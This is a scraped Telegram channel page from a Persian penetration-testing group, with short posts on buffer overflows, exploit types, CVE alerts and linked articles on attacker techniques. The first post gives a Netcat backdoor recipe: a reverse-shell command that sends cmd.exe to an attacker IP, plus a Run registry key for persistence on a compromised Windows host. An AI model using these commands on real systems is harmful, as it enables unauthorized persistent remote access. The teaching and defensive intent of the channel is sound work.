Bit Security Team – Telegram
Bit Security Team
84 subscribers
17 photos
40 videos
52 files
82 links
ارتباط با ادمین: @reza_sarvani

کاربردی ترین آموزش ها در زمینه تست نفوذ 📃

برنامه نویسی | هک | امنیت | تست نفوذ 🔐

همراه تیم امنیتی Bit باشید تا ریزترین مطالب رو یادبگیرید🔥

BitSecurityTeam.com
Download Telegram
سلام خدمت همه ی همراهان تیم امنیتی بیت🔥


توی این آموزش میخوایم ایجاد Backdoor رو با Netcat بررسی کنیم.


♦️اول اینکه Netcat چیه؟
این ابزار که به چاقوی سوئیسی هکر ها مشهوره برای ایجاد ارتباط بین دوتا سیستم از طریق محیط خط فرمان هست(هم ویندوز هم لینوکس)
این ابزار اوپن سرورس و رایگانه.

♦️اما سوال دوم اینکه Backdoor یا همون درب پشتی چیه؟

فرض کنید شما به یک سیستمی حمله کردید و دسترسی گرفتید. اما اگه مدیر اون سرور یا سیستم متوجه بشه و دسترسی شما رو قطع کنه چی میشه؟
تمام زحماتتون بر باد میره.

اما شما میتونید در زمانی که هنوز دسترسی دارید با روش های مختلفی میتونید یک دسترسی ثانویه برای خودتون ایجاد کنید که اگر دسترسی اول از دست رفت دسترسی ثانویه باقی بمونه.


🎯اما روش کار :
در این سناریو تارگت ما ویندوزی هست..🥊

بعد از گرفتن دسترسی باید فایل netcat.exe خودتون رو روی تارگت آپلود کنید.
بعد از آپلود باید این دستور رو توی خط فرمان تارگت وارد کنید :
nc -e cmd.exe <ActtackerIP> <port>

به جای attackerip باید ip سیستم خودتون و به جای port پورت دلخواه خودتونو بزارید.


بعد برای اتصال به بکدور باید این دستور رو روی سیستم خودتون بزنید :
nc -v <targetIP> <port>

که به جای targetip آدرس قربانی و به جای port همون پورتی که روی تارگت تنظیم کردید رو وارد کنید و دسترسی ایجاد میشه.


🚨اما یه نکته و اون اینکه این بکدور دائمی نیست و برای دائمی شدنش باید مسیر فایل nc.exe رو روی سیستم تارگت در رجیستری سیستم وارد کنید تا هربار که سیستم روشن میشه بکدور شما هم اجرا بشه
در این مسیر رجیستری:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run



@Bitsecurityteam
😅شیر اگه پیر هم باشه شیره



@Bitsecurityteam
[+] آسیب پذیری Buffer OverFolw و انواع آن

آسیب پذیری سر ریز بافر چیست؟
این آسیب پذیری باعث میشود که قسمی از حافظه تحت عنوان بافر پر شود و سرریز کند و همین سر ریز شدن به مهاجم اجازه میده تا کد های مخرب (Malicious Code) خودش رو به عنوان کد اصلی برنامه جا بزنه و از اونجایی که بافر پر شده هیچ گونه بررسی روی کد و Function های اون انجام نمیشه و مستقیم اجرا میشه.


انواع این آسیب پذیری :
× Stack-Based
× Heap-Based

البته دو نوع دیگر هم از این آسیب پذیری وجود داره که توی قسمت بعدی بررسی میشه.


نوع اول یعنی مبتنی بر Stack :
اول اینکه Stack یا پشته چی هست؟
پشته بخشی از ساختار memory هست که زمانی که یک Function فراخوانی میشه یک بلوک از پشته به اون اختصاص پیدا میکنه.
خب تا اینجا مشکلی نیست اما منطق کار پشته هست که مشکل ایجاد میکنه.
منطق پشته LIFO هست.
LIFO = Last In First Out
یعنی آخرین ورودی اولین خروجی هست.
یعنی وقتی پشته پر شد آخرین کد که کد مخرب هکر هست اولین چیزی هست که اجرا میشه و کار تمامه.

نوع دوم مبتنی بر Heap :
اما Heap چیه؟
یک قسمتی از memory هست که برخلاف پشته که به صورت استاتیک کار میکرد این قسمت به صورت داینامیک عمل میکنه.
یعنی هر زمانی که هر بلوکی از هیپ آزاد باشه متغیر های برنامه میتونن اون قسمت رو رزرو کنند.
و همین داینامیک بودن باعث میشه که هکر بتونه کد های مخربشو تزریق کنه به جای کد اصلی .
یعنی هر بار که هیپ پر میشه اگه هکر کد مخرب رو با کد اصلی جایگزین کنه چون هیچگونه بررسی انجام نمیشه مستقیم کد هکر اجرا میشه.




@BitSecurityteam
cs556-3rd-tutorial.pdf
723.6 KB
مقدمه ای بر برنامه نویسی شبکه در C

Socket Programming With C

@Bitsecurityteam
سلام خدمت همه ی همراهان تیم امنیتی بیت🔥

توی این مقاله میخوایم راجع به انواع اکسپلویت ها صحبت کنیم.
به طور کلی سه نوع اکسپلویت داریم :

A. Service Side
نوع اول مبتنی بر سرویس های شبکه هست.
اول ببینیم سرویس و اکسپلویت چیه؟
[1] - سرویس ها در واقع اون نرم افزار ها و خدماتی هستن که به صورت فعال روی سرور از طریق اینترنت یا شبکه محلی قابل دسترس هستند. مثل سرویس FTP یا اکتیو دایرکتوری یا DNS و... هستند مثل اکسپلویت های مربوط به همین آسیب پذیری اخیر به اسم PrintNightmare یا Spooler
حتما متوجه شدید که خیلی از این سرویس ها در واقع همون پروتکل های شبکه هستند.
[2] - اکسپلویت درواقع یک قطعه کد زبان های برنامه نویسی یا مجموعه دستورات پشت سر هم (شل اسکریپت) هست که با اهداف مختلفی روی یک سیستم به عنوان قربانی یا زامبی اجرا میشه.

B. Client Side :
این نوع اکسپلویت مربوط به نرم افزار های نصب شده یا تنظیمات انجام شده روی سیستم قربانی هست. مثلا اکسپلویت مربوط به آسیب پذیری مرورگر کروم یا مدیا پلیر VLC و...

C. Local Privilege Escalation :
دو نوع قبلی بیشتر برای ایجاد دسترسی به سیستم قربانی مورد استفاده قرار میگرفت اما این نوع سوم فقط برای ارتقاء سطح دسترسی در سیستم قربانی مورد استفاده هست. یعنی بعد از گرفتن دسترسی به سیستم قربانی برای اینکه سطح دسترسی خودمون رو به Root در لینوکس یا Administrator یا System در ویندوز ارتقاء بدیم و دسترسی کامل بگیریم به سیستم از این نوع اکسپلویت ها استفاده میکنیم مثل آسیب پذیری که در Sudo لینوکس وجود داشت که باعث میشد مهاجم دسترسی Root داشته باشه بدون مجوز .



موفق و پیروز باشید.


- - - - - - - @Pysecure | @Reza_sarvani - - - - - -



Channel ID : @Bitsecurityteam
سلام خدمت همه ی کاربران عزیز تیم امنیتی بیت
توی این سری از مقاله ها میخوایم Tactic ها و Technique های مختلف مهاجمان رو بررسی کنیم، که در اولین مقاله هم به بررسی Tactic ای به نام Persistence میپردازیم
حتما این سری از مقالات رو از دست ندید، چون دید خیلی خوبی از رفتار مهاجمان رو بهتون میده

تاکتیک Persistence چیست؟

Channel ID : @Bitsecurityteam
سلام خدمت تمامی کاربران عزیز تیم امنیتی بیت
فروم سایت راه اندازی شد 🔥
از این به بعد میتونید به سادگی Topic راه اندازی کنید و داخل انجمن سایت فعالیت کنید و پرسش و پاسخ های خودتون رو انجام بدین 💪🏻

آدرس انجمن: https://forum.bitsecurityteam.com

Channel ID : @Bitsecurityteam
Bit Security Team pinned «سلام خدمت تمامی کاربران عزیز تیم امنیتی بیت فروم سایت راه اندازی شد 🔥 از این به بعد میتونید به سادگی Topic راه اندازی کنید و داخل انجمن سایت فعالیت کنید و پرسش و پاسخ های خودتون رو انجام بدین 💪🏻 آدرس انجمن: https://forum.bitsecurityteam.com Channel ID…»
سلام خدمت همه ی کاربران عزیز تیم امنیتی بیت 🔥
توی این writeup به بررسی یک آسیب پذیری در پارامتر های Authentication وب اپلیکیشن میپردازیم که در نهایت باعث تبدیل آسیب پذیری LFI به RCE میشه
دوستان علاقه مند به Bug Bounty و شکار تهدیدات در وب، حتما Writeup هارو دنبال کنند، چون دید فوق العاده ای بهتون میده در خصوص Chain کردن آسیب پذیری ها و Explit کردنشون در شرایط مختلف

تبدیل آسیب پذیری LFI به RCE از طریق PHP Session Variable ها

در صورتی که سوالی داشتید حتما در فروم ما بپرسید تا بقیه دوستان هم درگیر سوالاتتون بشن

Channel ID : @Bitsecurityteam
سلام خدمت تمامی کاربران عزیز تیم امنیتی بیت
در این مقاله به بررسی روش خارج کردن اطلاعات و ارتباط با C&C Server به کمک DNS Tunneling پرداخته ایم تا با روش مورد علاقه Malware Author ها آشنا شویم

مقاله: آشنایی با DNS Tunneling برای برقراری ارتباط با C2

Channel ID : @Bitsecurityteam
♦️آسیب پذیری جدید در سیستم های مبتنی بر جونیپر (فایروال و..)

CVSS : 10 /10
CVE : CVE-2021-0248

@Bitsecurityteam
فایل های بالا سه مورد از بهترین منابع آموزشی جهت ابزار نویسی و تست نفوذ به واسطه زبان پایتون هستند.

@BITSECURITYTEAM
آسیب پذیری بسیار حیاتی مایکروسافت


CVE-2021-28476



@BITSECURITYTEAM
سلام خدمت همه ی همراهان تیم امنیتی بیت، در این مقاله قصد داریم تا به بررسی آسیب پذیری Unquoted Service Path بپردازیم و ببینیم که به کمک این آسیب پذیری چجوری میشه از Service های ویندوز سواستفاده کرد تا فایل مخرب Attacker روی سیستم Target اجرا بشه

مقاله: آشنایی با آسیب پذیری Unquoted Service Path

Channel ID : @Bitsecurityteam
نکاتی در خصوص Process نرمال svchost.exe
🔥 همیشه باید بدونید Normal چی هست تا بتونید Abnormal رو تشخیص بدید

@BitSecurityTeam